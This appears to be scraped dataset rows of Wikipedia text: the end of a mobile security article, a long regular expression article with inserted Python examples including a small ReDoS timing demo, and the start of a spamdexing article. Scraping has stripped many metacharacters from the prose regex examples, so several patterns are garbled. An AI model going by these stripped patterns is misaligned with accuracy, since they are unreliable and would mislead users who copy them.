agreement messages. 72 A recent survey by internet security experts BullGuard showed a lack of insight concerning the rising number of malicious threats affecting mobile phones, with 53% of users claiming that they are unaware of security software for smartphones. A further 21% argued that such protection was unnecessary, and 42% admitted it hadn't crossed their mind ("Using APA, 2011). full citation needed These statistics show that consumers are not concerned about security risks because they believe it is not a serious problem. However, in truth, smartphones are effectively handheld computers and are just as vulnerable. 
The following are precautions that a user can take to manage security on a smartphone: These precautions reduce the ability for people or malicious applications to exploit a user's smartphone. If users are careful, many attacks can be defeated, especially phishing and applications seeking only to obtain rights on a device. One form of mobile protection allows companies to control the delivery and storage of text messages, by hosting the messages on a company server, rather than on the sender or receiver's phone. When certain conditions are met, such as an expiration date, the messages are deleted. 79 The security mechanisms mentioned in this article are to a large extent inherited from knowledge and experience with computer security. The elements composing the two device types are similar, and there are common measures that can be used, such as antivirus software and firewalls. However, the implementation of these solutions is not necessarily possible (or is at least highly constrained) within a mobile device. The reason for this difference is the technical resources available to computers and mobile devices: even though the computing power of smartphones is becoming faster, they have other limitations: Furthermore, it is common that even if updates exist, or can be developed, they are not always deployed. For example, a user may not be aware of operating system updates; or a user may discover known vulnerabilities that are not corrected until the end of a long development cycle, which allows time to exploit the loopholes. 67 The following mobile environments are expected to make up future security frameworks: |
566 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Regular_expression | A regular expression (shortened as regex or regexp), 1 sometimes referred to as rational expression, 2 3 is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for "find" or "find and replace" operations on strings, or for input validation. Regular expression techniques are developed in theoretical computer science and formal language theory. The concept of regular expressions began in the 1950s, when the American mathematician Stephen Cole Kleene formalized the concept of a regular language. They came into common use with Unix text-processing utilities. Different syntaxes for writing regular expressions have existed since the 1980s, one being the POSIX standard and another, widely used, being the Perl syntax. Regular expressions are used in search engines, in search and replace dialogs of word processors and text editors, in text processing utilities such as sed and AWK, and in lexical analysis. Regular expressions are supported in many programming languages. Library implementations are often called an "engine", 4 5 and many of these are available for reuse. Regular expressions originated in 1951, when mathematician Stephen Cole Kleene described regular languages using his mathematical notation called regular events. 6 7 These arose in theoretical computer science, in the subfields of automata theory (models of computation) and the description and classification of formal languages, motivated by Kleene's attempt to describe early artificial neural networks. (Kleene introduced it as an alternative to McCulloch Pitts's "prehensible", but admitted "We would welcome any suggestions as to a more descriptive term. 8 ) Other early implementations of pattern matching include the SNOBOL language, which did not use regular expressions, but instead its own pattern matching constructs. Regular expressions entered popular use from 1968 in two uses: pattern matching in a text editor 9 and lexical analysis in a compiler. 10 Among the first appearances of regular expressions in program form was when Ken Thompson built Kleene's notation into the editor QED as a means to match patterns in text files. 9 11 12 13 For speed, Thompson implemented regular expression matching by just-in-time compilation (JIT) to IBM 7094 code on the Compatible Time-Sharing System, an important early example of JIT compilation. 14 He later added this capability to the Unix editor ed, which eventually led to the popular search tool grep's use of regular expressions ("grep" is a word derived from the command for regular expression searching in the ed editor: g re p meaning "Global search for Regular Expression and Print matching lines"). 15 Around the same time when Thompson developed QED, a group of researchers including Douglas T. Ross implemented a tool based on regular expressions that is used for lexical analysis in compiler design. 10 Many variations of these original forms of regular expressions were used in Unix 13 programs at Bell Labs in the 1970s, including lex, sed, AWK, and expr, and in other programs such as vi, and Emacs (which has its own, incompatible syntax and behavior). Regexes were subsequently adopted by a wide range of programs, with these early forms standardized in the POSIX.2 standard in 1992. 
In the 1980s, the more complicated regexes arose in Perl, which originally derived from a regex library written by Henry Spencer (1986), who later wrote an implementation for Tcl called Advanced Regular Expressions. 16 The Tcl library is a hybrid NFA DFA implementation with improved performance characteristics. Software projects that have adopted Spencer's Tcl regular expression implementation include PostgreSQL. 17 Perl later expanded on Spencer's original library to add many new features. 18 Part of the effort in the design of Raku (formerly named Perl 6) is to improve Perl's regex integration, and to increase their scope and capabilities to allow the definition of parsing expression grammars. 19 The result is a mini-language called Raku rules, which are used to define Raku grammar as well as provide a tool to programmers in the language. These rules maintain existing features of Perl 5.x regexes, but also allow BNF-style definition of a recursive descent parser via sub-rules. The use of regexes in structured information standards for document and database modeling started in the 1960s and expanded in the 1980s when industry standards like ISO SGML (precursored by ANSI "GCA 101 1983") consolidated. The kernel of the structure specification language standards consists of regexes. Its use is evident in the DTD element group syntax. Prior to the use of regular expressions, many search languages allowed simple wildcards, for example to match any sequence of characters, and ? to match a single character. Relics of this can be found today in the glob syntax for filenames, and in the SQL LIKE operator. Starting in 1997, Philip Hazel developed PCRE (Perl Compatible Regular Expressions), which attempts to closely mimic Perl's regex functionality and is used by many modern tools including PHP and Apache HTTP Server. 20 Today, regexes are widely supported in programming languages, text processing programs (particularly lexers), advanced text editors, and some other programs. Regex support is part of the standard library of many programming languages, including Java and Python, and is built into the syntax of others, including Perl and ECMAScript. In the late 2010s, several companies started to offer hardware, FPGA, 21 GPU 22 implementations of PCRE compatible regex engines that are faster compared to CPU implementations. The phrase regular expressions, or regexes, is often used to mean the specific, standard textual syntax for representing patterns for matching text, as distinct from the mathematical notation described below. Each character in a regular expression (that is, each character in the string describing its pattern) is either a metacharacter, having a special meaning, or a regular character that has a literal meaning. For example, in the regex b., 'b' is a literal character that matches just 'b', while . is a metacharacter that matches every character except a newline. Therefore, this regex matches, for example, 'b , or 'bx', or 'b5'. Together, metacharacters and literal characters can be used to identify text of a given pattern or process a number of instances of it. Pattern matches may vary from a precise equality to a very general similarity, as controlled by the metacharacters. For example, . is a very general pattern, a-z (match all lower case letters from 'a' to 'z') is less general and b is a precise pattern (matches just 'b'). 
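The b. example above can be restated in runnable form with Python's re module; the sample strings below are illustrative choices, not the article's originals. 'b' is a literal, the dot is a metacharacter matching any character except a newline, and a character range such as [a-z] sits between the two in generality.

import re

# 'b.': literal 'b' followed by any single character except a newline
pattern = re.compile(r"b.")
for s in ["b%", "bx", "b5", "b\n", "a7"]:
    print(repr(s), bool(pattern.fullmatch(s)))   # first three True, last two False

# '[a-z]' matches exactly one lowercase letter; the bare literal 'b' is the most precise pattern
print(bool(re.fullmatch(r"[a-z]", "q")))   # True
print(bool(re.fullmatch(r"[a-z]", "Q")))   # False
print(bool(re.fullmatch(r"b", "b")))       # True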
The metacharacter syntax is designed specifically to represent prescribed targets in a concise and flexible way to direct the automation of text processing of a variety of input data, in a form easy to type using a standard ASCII keyboard. A very simple case of a regular expression in this syntax is to locate a word spelled two different ways in a text editor, the regular expression seriali sz e matches both "serialise" and "serialize". Wildcard characters also achieve this, but are more limited in what they can pattern, as they have fewer metacharacters and a simple language-base. The usual context of wildcard characters is in globbing similar names in a list of files, whereas regexes are usually employed in applications that pattern-match text strings in general. For example, the regex t t matches excess whitespace at the beginning or end of a line. An advanced regular expression that matches any numeral is ?( d ( . d )? . d )( eE ? d )?. A regex processor translates a regular expression in the above syntax into an internal representation that can be executed and matched against a string representing the text being searched in. One possible approach is the Thompson's construction algorithm to construct a nondeterministic finite automaton (NFA), which is then made deterministic and the resulting deterministic finite automaton (DFA) is run on the target text string to recognize substrings that match the regular expression. The picture shows the NFA scheme N(s ) obtained from the regular expression s , where s denotes a simpler regular expression in turn, which has already been recursively translated to the NFA N(s). A regular expression, often called a pattern, specifies a set of strings required for a particular purpose. A simple way to specify a finite set of strings is to list its elements or members. However, there are often more concise ways: for example, the set containing the three strings "Handel", "H ndel", and "Haendel" can be specified by the pattern H( ae?)ndel; we say that this pattern matches each of the three strings. However, there can be many ways to write a regular expression for the same set of strings: for example, (H n Han Haen)del also specifies the same set of three strings in this example. Most formalisms provide the following operations to construct regular expressions. These constructions can be combined to form arbitrarily complex expressions, much like one can construct arithmetical expressions from numbers and the operations , , , and . The precise syntax for regular expressions varies among tools and with context; more detail is given in Syntax. Regular expressions describe regular languages in formal language theory. They have the same expressive power as regular grammars. Regular expressions consist of constants, which denote sets of strings, and operator symbols, which denote operations over these sets. The following definition is standard, and found as such in most textbooks on formal language theory. 24 25 Given a finite alphabet , the following constants are defined as regular expressions: Given regular expressions R and S, the following operations over them are defined to produce regular expressions: To avoid parentheses, it is assumed that the Kleene star has the highest priority followed by concatenation, then alternation. If there is no ambiguity, then parentheses may be omitted. For example, (ab)c can be written as abc, and a (b(c )) can be written as a bc . Many textbooks use the symbols , , or for alternation instead of the vertical bar. 
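The example expressions in this passage can be written out and tested in Python. The patterns below (the serialise/serialize pattern, the Händel pattern, a leading/trailing-whitespace pattern, and a signed-numeral pattern) are plausible reconstructions rather than verbatim copies of the article's expressions.

import re

# One pattern for both spellings
print([w for w in ["serialise", "serialize", "serialism"]
       if re.fullmatch(r"seriali[sz]e", w)])            # ['serialise', 'serialize']

# One pattern for the three name variants
print([n for n in ["Handel", "Händel", "Haendel", "Hendel"]
       if re.fullmatch(r"H(ä|ae?)ndel", n)])            # the first three only

# Excess whitespace at the beginning or end of a line
trim = re.compile(r"^[ \t]+|[ \t]+$", re.MULTILINE)
print(repr(trim.sub("", "  padded line \t")))           # 'padded line'

# An optionally signed numeral with optional fraction and exponent
numeral = re.compile(r"[+-]?(\d+(\.\d+)?|\.\d+)([eE][+-]?\d+)?")
print([numeral.fullmatch(x) is not None for x in ["42", "-3.14", ".5e10", "abc"]])  # [True, True, True, False]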
Examples: The formal definition of regular expressions is minimal on purpose, and avoids defining ? and +—these can be expressed as follows: a+ = aa*, and a? = (a|ε). Sometimes the complement operator is added, to give a generalized regular expression; here Rc matches all strings over Σ that do not match R. In principle, the complement operator is redundant, because it does not grant any more expressive power. However, it can make a regular expression much more concise—eliminating a single complement operator can cause a double exponential blow-up of its length. 26 27 28 Regular expressions in this sense can express the regular languages, exactly the class of languages accepted by deterministic finite automata. There is, however, a significant difference in compactness. Some classes of regular languages can only be described by deterministic finite automata whose size grows exponentially in the size of the shortest equivalent regular expressions. The standard example here is the languages Lk consisting of all strings over the alphabet {a,b} whose kth-from-last letter equals a. On the one hand, a regular expression describing L4 is given by (a|b)*a(a|b)(a|b)(a|b). Generalizing this pattern to Lk gives the expression (a|b)*a(a|b)⋯(a|b) with k−1 copies of (a|b) after the a. On the other hand, it is known that every deterministic finite automaton accepting the language Lk must have at least 2^k states. Luckily, there is a simple mapping from regular expressions to the more general nondeterministic finite automata (NFAs) that does not lead to such a blowup in size; for this reason NFAs are often used as alternative representations of regular languages. NFAs are a simple variation of the type-3 grammars of the Chomsky hierarchy. 24 In the opposite direction, there are many languages easily described by a DFA that are not easily described by a regular expression. For instance, determining the validity of a given ISBN requires computing the modulus of the integer base 11, and can be easily implemented with an 11-state DFA. However, converting it to a regular expression results in a 2.14-megabyte file. 29 Given a regular expression, Thompson's construction algorithm computes an equivalent nondeterministic finite automaton. A conversion in the opposite direction is achieved by Kleene's algorithm. Finally, it is worth noting that many real-world "regular expression" engines implement features that cannot be described by the regular expressions in the sense of formal language theory; rather, they implement regexes. See below for more on this. As seen in many of the examples above, there is more than one way to construct a regular expression to achieve the same results. It is possible to write an algorithm that, for two given regular expressions, decides whether the described languages are equal; the algorithm reduces each expression to a minimal deterministic finite state machine, and determines whether they are isomorphic (equivalent). Algebraic laws for regular expressions can be obtained using a method by Gischer, which is best explained by an example: In order to check whether (X+Y)* and (X*Y*)* denote the same regular language, for all regular expressions X, Y, it is necessary and sufficient to check whether the particular regular expressions (a+b)* and (a*b*)* denote the same language over the alphabet {a,b}. More generally, an equation E = F between regular-expression terms with variables holds if, and only if, its instantiation with different variables replaced by different symbol constants holds. 
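As a concrete check of the compactness example, the short sketch below verifies by brute force that the reconstructed expression (a|b)*a(a|b)(a|b)(a|b) accepts exactly the strings over {a,b} whose fourth-from-last letter is a; it is an illustration, not part of the cited material.

import re
from itertools import product

L4 = re.compile(r"(a|b)*a(a|b)(a|b)(a|b)")

# Exhaustive check over all strings of length 4 to 8
for n in range(4, 9):
    for chars in product("ab", repeat=n):
        s = "".join(chars)
        assert (L4.fullmatch(s) is not None) == (s[-4] == "a")
print("The regex agrees with the fourth-from-last-letter definition up to length 8.")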
30 31 Every regular expression can be written solely in terms of the Kleene star and set unions over finite words. This is a surprisingly difficult problem. As simple as the regular expressions are, there is no method to systematically rewrite them to some normal form. The lack of axiom in the past led to the star height problem. In 1991, Dexter Kozen axiomatized regular expressions as a Kleene algebra, using equational and Horn clause axioms. 32 Already in 1964, Redko had proved that no finite set of purely equational axioms can characterize the algebra of regular languages. 33 A regex pattern matches a target string. The pattern is composed of a sequence of atoms. An atom is a single point within the regex pattern which it tries to match to the target string. The simplest atom is a literal, but grouping parts of the pattern to match an atom will require using ( ) as metacharacters. Metacharacters help form: atoms; quantifiers telling how many atoms (and whether it is a greedy quantifier or not); a logical OR character, which offers a set of alternatives, and a logical NOT character, which negates an atom's existence; and backreferences to refer to previous atoms of a completing pattern of atoms. A match is made, not when all the atoms of the string are matched, but rather when all the pattern atoms in the regex have matched. The idea is to make a small pattern of characters stand for a large number of possible strings, rather than compiling a large list of all the literal possibilities. Depending on the regex processor there are about fourteen metacharacters, characters that may or may not have their literal character meaning, depending on context, or whether they are "escaped", i.e. preceded by an escape sequence, in this case, the backslash . Modern and POSIX extended regexes use metacharacters more often than their literal meaning, so to avoid "backslash-osis" or leaning toothpick syndrome, they have a metacharacter escape to a literal mode; starting out, however, they instead have the four bracketing metacharacters ( ) and be primarily literal, and "escape" this usual meaning to become metacharacters. Common standards implement both. The usual metacharacters are () . ? and . The usual characters that become metacharacters when escaped are dswDSW and N. When entering a regex in a programming language, they may be represented as a usual string literal, hence usually quoted; this is common in C, Java, and Python for instance, where the regex re is entered as "re". However, they are often written with slashes as delimiters, as in re for the regex re. This originates in ed, where is the editor command for searching, and an expression re can be used to specify a range of lines (matching the pattern), which can be combined with other commands on either side, most famously g re p as in grep ("global regex print"), which is included in most Unix-based operating systems, such as Linux distributions. A similar convention is used in sed, where search and replace is given by s re replacement and patterns can be joined with a comma to specify a range of lines as in re1 , re2 . This notation is particularly well known due to its use in Perl, where it forms part of the syntax distinct from normal string literals. In some cases, such as sed and Perl, alternative delimiters can be used to avoid collision with contents, and to avoid having to escape occurrences of the delimiter character in the contents. For example, in sed the command s, ,X, will replace a with an X, using commas as delimiters. 
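Escaping is easy to demonstrate in Python: a metacharacter preceded by a backslash is taken literally, and re.escape produces the fully escaped form automatically. The sample strings are illustrative.

import re

price = "$5.99 (sale)"

# Escaped by hand: '$', '.', '(' and ')' are treated as literals
print(re.search(r"\$5\.99 \(sale\)", price) is not None)                  # True

# re.escape builds the same literal pattern programmatically
print(re.search(re.escape(price), "was $5.99 (sale) today") is not None)  # True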
The IEEE POSIX standard has three sets of compliance: BRE (Basic Regular Expressions), 34 ERE (Extended Regular Expressions), and SRE (Simple Regular Expressions). SRE is deprecated, 35 in favor of BRE, as both provide backward compatibility. The subsection below covering the character classes applies to both BRE and ERE. BRE and ERE work together. ERE adds ?, , and , and it removes the need to escape the metacharacters ( ) and , which are required in BRE. Furthermore, as long as the POSIX standard syntax for regexes is adhered to, there can be, and often is, additional syntax to serve specific (yet POSIX compliant) applications. Although POSIX.2 leaves some implementation specifics undefined, BRE and ERE provide a "standard" which has since been adopted as the default syntax of many tools, where the choice of BRE or ERE modes is usually a supported option. For example, GNU grep has the following options: "grep -E" for ERE, and "grep -G" for BRE (the default), and "grep -P" for Perl regexes. Perl regexes have become a de facto standard, having a rich and powerful set of atomic expressions. Perl has no "basic" or "extended" levels. As in POSIX EREs, ( ) and are treated as metacharacters unless escaped; other metacharacters are known to be literal or symbolic based on context alone. Additional functionality includes lazy matching, backreferences, named capture groups, and recursive patterns. In the POSIX standard, Basic Regular Syntax (BRE) requires that the metacharacters ( ) and be designated ( ) and , whereas Extended Regular Syntax (ERE) does not. The - character is treated as a literal character if it is the last or the first (after the , if present) character within the brackets: abc , abc , abc . Backslash escapes are not allowed. The character can be included in a bracket expression if it is the first (after the , if present) character: abc , abc . Examples: According to Ross Cox, the POSIX specification requires ambiguous subexpressions to be handled in a way different from Perl's. The committee replaced Perl's rules with one that is simple to explain, but the new "simple" rules are actually more complex to implement: they were incompatible with pre-existing tooling and made it essentially impossible to define a "lazy match" (see below) extension. As a result, very few programs actually implement the POSIX subexpression rules (even when they implement other parts of the POSIX syntax). 37 The meaning of metacharacters escaped with a backslash is reversed for some characters in the POSIX Extended Regular Expression (ERE) syntax. With this syntax, a backslash causes the metacharacter to be treated as a literal character. So, for example, ( ) is now ( ) and is now . Additionally, support is removed for n backreferences and the following metacharacters are added: Examples: POSIX Extended Regular Expressions can often be used with modern Unix utilities by including the command line flag -E. The character class is the most basic regex concept after a literal match. It makes one small sequence of characters match a larger set of characters. For example, A-Z could stand for any uppercase letter in the English alphabet, and d could mean any digit. Character classes apply to both POSIX levels. When specifying a range of characters, such as a-Z (i.e. lowercase a to uppercase Z), the computer's locale settings determine the contents by the numeric ordering of the character encoding. They could store digits in that sequence, or the ordering could be abc...zABC...Z, or aAbBcC...zZ. 
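The bracket-expression placement rules described above (a literal '-' first or last, a literal ']' first, '^' for negation) carry over to Python's re syntax, shown in the short sketch below; note that Python's re does not implement the POSIX [:class:] names discussed next, so ordinary ranges are used instead.

import re

# '-' is literal when it is the first or last character of the class
print(re.findall(r"[-abc]", "a-b_c"))   # ['a', '-', 'b', 'c']
print(re.findall(r"[abc-]", "a-b_c"))   # ['a', '-', 'b', 'c']

# ']' is literal when it is the first character of the class
print(re.findall(r"[]abc]", "a]b"))     # ['a', ']', 'b']

# '^' as the first character negates the class
print(re.findall(r"[^abc]", "a-b_c"))   # ['-', '_']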
So the POSIX standard defines a character class, which will be known by the regex processor installed. Those definitions are in the following table: POSIX character classes can only be used within bracket expressions. For example, :upper: ab matches the uppercase letters and lowercase "a" and "b". An additional non-POSIX class understood by some tools is :word: , which is usually defined as :alnum: plus underscore. This reflects the fact that in many programming languages these are the characters that may be used in identifiers. The editor Vim further distinguishes word and word-head classes (using the notation w and h) since in many programming languages the characters that can begin an identifier are not the same as those that can occur in other positions: numbers are generally excluded, so an identifier would look like h w or :alpha: :alnum: in POSIX notation. Note that what the POSIX regex standards call character classes are commonly referred to as POSIX character classes in other regex flavors which support them. With most other regex flavors, the term character class is used to describe what POSIX calls bracket expressions. Because of its expressive power and (relative) ease of reading, many other utilities and programming languages have adopted syntax similar to Perl's—for example, Java, JavaScript, Julia, Python, Ruby, Qt, Microsoft's .NET Framework, and XML Schema. Some languages and tools such as Boost and PHP support multiple regex flavors. Perl-derivative regex implementations are not identical and usually implement a subset of features found in Perl 5.0, released in 1994. Perl sometimes does incorporate features initially found in other languages. For example, Perl 5.10 implements syntactic extensions originally developed in PCRE and Python. 38 In Python and some other implementations (e.g. Java), the three common quantifiers ( , and ?) are greedy by default because they match as many characters as possible. 39 The regex . (including the double-quotes) applied to the string matches the entire line (because the entire line begins and ends with a double-quote) instead of matching only the first part, "Ganymede, . The aforementioned quantifiers may, however, be made lazy or minimal or reluctant, matching as few characters as possible, by appending a question mark: . ? matches only "Ganymede, . 39 In Java and Python 3.11 , 40 quantifiers may be made possessive by appending a plus sign, which disables backing off (in a backtracking engine), even if doing so would allow the overall match to succeed: 41 While the regex . applied to the string matches the entire line, the regex . does not match at all, because . consumes the entire input, including the final . Thus, possessive quantifiers are most useful with negated character classes, e.g. , which matches "Ganymede, when applied to the same string. Another common extension serving the same function is atomic grouping, which disables backtracking for a parenthesized group. The typical syntax is (? group). For example, while (wi w)i matches both wi and wii, (? wi w)i only matches wii because the engine is forbidden from backtracking and so cannot try setting the group to "w" after matching "wi". 42 Possessive quantifiers are easier to implement than greedy and lazy quantifiers, and are typically more efficient at runtime. 41 IETF RFC 9485 describes "I-Regexp: An Interoperable Regular Expression Format". It specifies a limited subset of regular-expression idioms designed to be interoperable, i.e. 
produce the same effect, in a large number of regular-expression libraries. I-Regexp is also limited to matching, i.e. providing a true or false match between a regular expression and a given piece of text. Thus, it lacks advanced features such as capture groups, lookahead, and backreferences. 43 Many features found in virtually all modern regular expression libraries provide an expressive power that exceeds the regular languages. For example, many implementations allow grouping subexpressions with parentheses and recalling the value they match in the same expression (backreferences). This means that, among other things, a pattern can match strings of repeated words like "papa" or "WikiWiki", called squares in formal language theory. The pattern for these strings is (. ) 1. The language of squares is not regular, nor is it context-free, due to the pumping lemma. However, pattern matching with an unbounded number of backreferences, as supported by numerous modern tools, is still context sensitive. 44 The general problem of matching any number of backreferences is NP-complete, and the execution time for known algorithms grows exponentially by the number of backreference groups used. 45 However, many tools, libraries, and engines that provide such constructions still use the term regular expression for their patterns. This has led to a nomenclature where the term regular expression has different meanings in formal language theory and pattern matching. For this reason, some people have taken to using the term regex, regexp, or simply pattern to describe the latter. Larry Wall, author of the Perl programming language, writes in an essay about the design of Raku: "Regular expressions" … are only marginally related to real regular expressions. Nevertheless, the term has grown with the capabilities of our pattern matching engines, so I'm not going to try to fight linguistic necessity here. I will, however, generally call them "regexes" (or "regexen", when I'm in an Anglo-Saxon mood). 19 Other features not found in describing regular languages include assertions. These include the ubiquitous and , used since at least 1970, 46 as well as some more sophisticated extensions like lookaround that appeared in 1994. 47 Lookarounds define the surrounding of a match and do not spill into the match itself, a feature only relevant for the use case of string searching citation needed . Some of them can be simulated in a regular language by treating the surroundings as a part of the language as well. 48 The look-ahead assertions (? ...) and (? ...) have been attested since at least 1994, starting with Perl 5. 47 The look-behind assertions (? ...) and (? ...) are attested since 1997 in a commit by Ilya Zakharevich to Perl 5.005. 49 There are at least three different algorithms that decide whether and how a given regex matches a string. The oldest and fastest relies on a result in formal language theory that allows every nondeterministic finite automaton (NFA) to be transformed into a deterministic finite automaton (DFA). The DFA can be constructed explicitly and then run on the resulting input string one symbol at a time. Constructing the DFA for a regular expression of size m has the time and memory cost of O(2m), but it can be run on a string of size n in time O(n). Note that the size of the expression is the size after abbreviations, such as numeric quantifiers, have been expanded. 
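The quantifier and backreference behaviour described above can be reproduced in a few lines of Python. The quoted sentence is a stand-in for the article's sample string, and the possessive form needs Python 3.11 or later, so it is left commented out.

import re

line = '"Ganymede," he continued, "is the largest moon in the Solar System."'

print(re.search(r'".+"', line).group())     # greedy: the whole quoted line
print(re.search(r'".+?"', line).group())    # lazy: just '"Ganymede,"'
print(re.search(r'"[^"]*"', line).group())  # negated character class: also '"Ganymede,"'

# Possessive quantifier (Python 3.11+): '.++' never gives back the closing quote, so no match
# print(re.search(r'".++"', line))          # None

# Backreference: (\w+)\1 matches "squares" such as papa or WikiWiki
print(re.search(r"(\w+)\1", "papa").group())      # 'papa'
print(re.search(r"(\w+)\1", "WikiWiki").group())  # 'WikiWiki'

# Lookarounds assert on surrounding context without consuming it
print(re.findall(r"\d+(?= dollars)", "5 dollars and 10 cents"))  # ['5']
print(re.findall(r"(?<=\$)\d+", "price: $42"))                   # ['42']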
An alternative approach is to simulate the NFA directly, essentially building each DFA state on demand and then discarding it at the next step. This keeps the DFA implicit and avoids the exponential construction cost, but running cost rises to O(mn). The explicit approach is called the DFA algorithm and the implicit approach the NFA algorithm. Adding caching to the NFA algorithm is often called the "lazy DFA" algorithm, or just the DFA algorithm without making a distinction. These algorithms are fast, but using them for recalling grouped subexpressions, lazy quantification, and similar features is tricky. 50 51 Modern implementations include the re1 re2 sregex family based on Cox's code. The third algorithm is to match the pattern against the input string by backtracking. This algorithm is commonly called NFA, but this terminology can be confusing. Its running time can be exponential, which simple implementations exhibit when matching against expressions like (a aa) b that contain both alternation and unbounded quantification and force the algorithm to consider an exponentially increasing number of sub-cases. This behavior can cause a security problem called Regular expression Denial of Service (ReDoS). Although backtracking implementations only give an exponential guarantee in the worst case, they provide much greater flexibility and expressive power. For example, any implementation which allows the use of backreferences, or implements the various extensions introduced by Perl, must include some kind of backtracking. Some implementations try to provide the best of both algorithms by first running a fast DFA algorithm, and revert to a potentially slower backtracking algorithm only when a backreference is encountered during the match. GNU grep (and the underlying gnulib DFA) uses such a strategy. 52 Sublinear runtime algorithms have been achieved using Boyer-Moore (BM) based algorithms and related DFA optimization techniques such as the reverse scan. 53 GNU grep, which supports a wide variety of POSIX syntaxes and extensions, uses BM for a first-pass prefiltering, and then uses an implicit DFA. Wu agrep, which implements approximate matching, combines the prefiltering into the DFA in BDM (backward DAWG matching). NR-grep's BNDM extends the BDM technique with Shift-Or bit-level parallelism. 54 A few theoretical alternatives to backtracking for backreferences exist, and their "exponents" are tamer in that they are only related to the number of backreferences, a fixed property of some regexp languages such as POSIX. One naive method that duplicates a non-backtracking NFA for each backreference note has a complexity of O ( n 2 k 2 ) displaystyle mathrm O (n 2k 2 ) time and O ( n 2 k 1 ) displaystyle mathrm O (n 2k 1 ) space for a haystack of length n and k backreferences in the RegExp. 55 A very recent theoretical work based on memory automata gives a tighter bound based on "active" variable nodes used, and a polynomial possibility for some backreferenced regexps. 56 In theoretical terms, any token set can be matched by regular expressions as long as it is pre-defined. In terms of historical implementations, regexes were originally written to use ASCII characters as their token set though regex libraries have supported numerous other character sets. Many modern regex engines offer at least some support for Unicode. In most respects it makes no difference what the character set is, but some issues do arise when extending regexes to support Unicode. 
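The exponential worst case of a backtracking engine is easy to observe with Python's re module, which backtracks. The sketch below times the (a|aa)*b pattern against runs of a's that contain no b, so every way of splitting the run must be tried before failure is reported; the input sizes are deliberately small because the cost grows exponentially with each added character. Automaton-based engines such as RE2 avoid this worst case at the price of features like backreferences.

import re
import time

pattern = re.compile(r"(a|aa)*b")       # alternation plus unbounded repetition

for n in (18, 22, 26):
    text = "a" * n                      # no 'b': the match fails only after exhaustive backtracking
    start = time.perf_counter()
    assert pattern.match(text) is None
    print(f"n={n}: {time.perf_counter() - start:.4f} s")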
Most general-purpose programming languages support regex capabilities, either natively or via libraries. Comprehensive support is included in many of them. Regexes are useful in a wide variety of text processing tasks, and more generally string processing, where the data need not be textual. Common applications include data validation, data scraping (especially web scraping), data wrangling, simple parsing, the production of syntax highlighting systems, and many other tasks. While regexes would be useful on Internet search engines, processing them across the entire database could consume excessive computer resources depending on the complexity and design of the regex. Although in many cases system administrators can run regex-based queries internally, most search engines do not offer regex support to the public. Notable exceptions include Google Code Search and Exalead. However, Google Code Search was shut down in January 2012. 69 The specific syntax rules vary depending on the specific implementation, programming language, or library in use. Additionally, the functionality of regex implementations can vary between versions. Because regexes can be difficult to both explain and understand without examples, interactive websites for testing regexes are a useful resource for learning regexes by experimentation. This section provides a basic description of some of the properties of regexes by way of illustration. The following conventions are used in the examples. 70 Also worth noting is that these regexes are all in Perl-like syntax; standard POSIX regular expressions are different. Unless otherwise indicated, the following examples conform to the Perl programming language, release 5.8.8, January 31, 2006. This means that other implementations may lack support for some parts of the syntax shown here (e.g. basic vs. extended regex, \(\) vs. (), or lack of \d instead of POSIX [:digit:]). The syntax and conventions used in these examples coincide with those of other programming environments as well. 71 (Worked example expressions and their outputs are omitted here.) Note that in Unicode, 58 the Alphabetic property contains more than Latin letters, and the Decimal Number property contains more than the Arabic digits. Regular expressions can often be created ("induced" or "learned") based on a set of example strings. This is known as the induction of regular languages and is part of the general problem of grammar induction in computational learning theory. Formally, given examples of strings in a regular language, and perhaps also given examples of strings not in that regular language, it is possible to induce a grammar for the language, i.e., a regular expression that generates that language. Not all regular languages can be induced in this way (see language identification in the limit), but many can. For example, the set of examples {1, 10, 100}, and negative set (of counterexamples) {11, 1001, 101, 0}, can be used to induce the regular expression 10* (1 followed by zero or more 0s). |
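As a quick check of the induction example at the end of this passage, the expression 10* can be tested against the positive and negative sample sets in Python:

import re

positives = ["1", "10", "100"]
negatives = ["11", "1001", "101", "0"]

induced = re.compile(r"10*")   # '1' followed by zero or more '0's

print(all(induced.fullmatch(s) for s in positives))      # True
print(not any(induced.fullmatch(s) for s in negatives))  # True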
567 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Spamdexing | Spamdexing (also known as search engine spam, search engine poisoning, black-hat search engine optimization, search spam or web spam) 1 is the deliberate manipulation of search engine indexes. It involves a number of methods, such as link building and repeating unrelated phrases, to manipulate the relevance or prominence of resources indexed in a manner inconsistent with the purpose of the indexing system. 2 3 Spamdexing could be considered to be a part of search engine optimization, 4 although there are many SEO methods that improve the quality and appearance of the content of web sites and serve content useful to many users. 5 Search engines use a variety of algorithms to determine relevancy ranking. Some of these include determining whether the search term appears in the body text or URL of a web page. Many search engines check for instances of spamdexing and will remove suspect pages from their indexes. Also, search-engine operators can quickly block the results listing from entire websites that use spamdexing, perhaps in response to user complaints of false matches. The rise of spamdexing in the mid 1990s made the leading search engines of the time less useful. Using unethical methods to make websites rank higher in search engine results than they otherwise would is commonly referred to in the SEO (search engine optimization) industry as "black-hat SEO". 6 These methods are more focused on breaking the search-engine-promotion rules and guidelines. In addition to this, the perpetrators run the risk of their websites being severely penalized by the Google Panda and Google Penguin search-results ranking algorithms. 7 Common spamdexing techniques can be classified into two broad classes: content spam 5 (term spam) and link spam. 3 The earliest known reference 2 to the term spamdexing is by Eric Convey in his article "Porn sneaks way back on Web", The Boston Herald, May 22, 1996, where he said: The problem arises when site operators load their Web pages with hundreds of extraneous terms so search engines will list them among legitimate addresses. The process is called "spamdexing, a combination of spamming—the Internet term for sending users unsolicited information—and "indexing. 2 These techniques involve altering the logical view that a search engine has over the page's contents. They all aim at variants of the vector space model for information retrieval on text collections. Keyword stuffing involves the calculated placement of keywords within a page to raise the keyword count, variety, and density of the page. This is useful to make a page appear to be relevant for a web crawler in a way that makes it more likely to be found. Example: A promoter of a Ponzi scheme owns a site advertising a scam and wants to attract people to it. The scammer places hidden text appropriate for a fan page of a popular music group on the page, hoping that the page will be listed as a fan site and receive many visits from music lovers. Older versions of indexing programs simply counted how often a keyword appeared, and used that to determine relevance levels. Most modern search engines have the ability to analyze a page for keyword stuffing and determine whether the frequency is consistent with other sites created specifically to attract search engine traffic. Also, large webpages are truncated, so that massive dictionary lists cannot be indexed on a single webpage. 
